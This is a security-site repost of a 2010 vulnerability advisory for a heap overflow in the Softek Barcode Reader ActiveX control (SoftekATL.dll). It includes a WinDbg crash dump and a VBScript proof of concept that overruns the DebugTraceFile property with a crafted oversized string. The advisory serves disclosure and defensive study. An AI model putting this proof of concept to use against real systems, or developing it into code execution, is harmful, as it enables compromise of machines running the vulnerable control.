首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow P
来源:vfocus.net 作者:LiquidWorm 发布时间:2010-09-23  

Softek Barcode Reader Toolkit ActiveX 7.1.4.14 (SoftekATL.dll) Buffer Overflow PoC


Vendor: Softek Software Ltd
Product web page: http://www.bardecode.com
Affected version: 7.1.4.14

Summary: The Softek Barcode Reader Toolkit for Windows is a SDK that enables applications
to extract barcode information from images. The API's available in the toolkit include .net,
java, com, ocx and windows dll. The standard version includes support for both 1 and 2-D
barcodes and special features include the ability to split documents by barcode position.

Desc: The vulnerability is caused due to a boundary error in SoftekATL.DLL when handling the
value assigned to the "DebugTraceFile" property and can be exploited to cause a heap-based
buffer overflow via an overly long string which may lead to execution of arbitrary code.


--------------------------------------------------------------------------

(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=44444444 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4444443c
eip=7c96fa89 esp=0013f0a0 ebp=0013f100 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4444443c=????
0:000> g
(824.ce0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=42424242 ecx=7ffdf000 edx=00470608 esi=00470000 edi=4242423a
eip=7c96fa89 esp=0013f0ac ebp=0013f10c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpNtMakeTemporaryKey+0x7d45:
7c96fa89 0fb707          movzx   eax,word ptr [edi]       ds:0023:4242423a=????
0:000> g
eax=00000000 ebx=00000000 ecx=7c800000 edx=7c97e120 esi=7c90de6e edi=00000000
eip=7c90e514 esp=0013fe5c ebp=0013ff58 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
7c90e514 c3              ret

-----------------------

EIP 7C96FA89
EAX 00000001
EBX 42424242
ECX 7FFDD000 -> 0013F0FC
EDX 00470608 -> 00152CA0
EDI 42424239
ESI 00470000 -> 000000C8
EBP 0013F10C -> 0013F1F4
ESP 0013F0AC -> 00470000

--------------------------------------------------------------------------

 

Tested on: Microsoft Windows XP Professional SP3 (English)
           Microsoft Windows Internet Explorer 8.0.6001.18702
           Softek Barcode Reader 7.3.1

 

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

21.09.2010


Advisory ID: ZSL-2010-4965
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4965.php

 

Proof of Concept:
-----------------

<object classid='clsid:11E7DA45-B56D-4078-89F6-D3D651EC4CD6' id='bardecode' />
<script language='vbscript'>

targetFile = "C:\Program Files\Softek Software\Softek Barcode Toolkit\bin\SoftekATL.dll"
prototype  = "Property Let DebugTraceFile As String"
memberName = "DebugTraceFile"
progid     = "SoftekATL.CBarcode"
argCount   = 1

buffof = String(262, "A") + "BBBB" + String(4408, "C") + "DDDD"

bardecode.DebugTraceFile = buffof

</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Acoustica Audio Converter Pro
·Novell iPrint Client ActiveX C
·Personal.Net Portal Multiple V
·Novell iPrint Client ActiveX C
·Ubuntu Linux 'mountall' Local
·万博网站管理系统(NWEB)通杀漏洞
·gausCMS Multiple Vulnerabiliti
·BifrsoT DLL Hijacking Exploit
·Adobe Shockwave Director tSAC
·RarCrack v0.2 "filename" init(
·Skybluecanvas.v1.1-r248 CSRF v
·Microsoft DRM Technology (msne
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved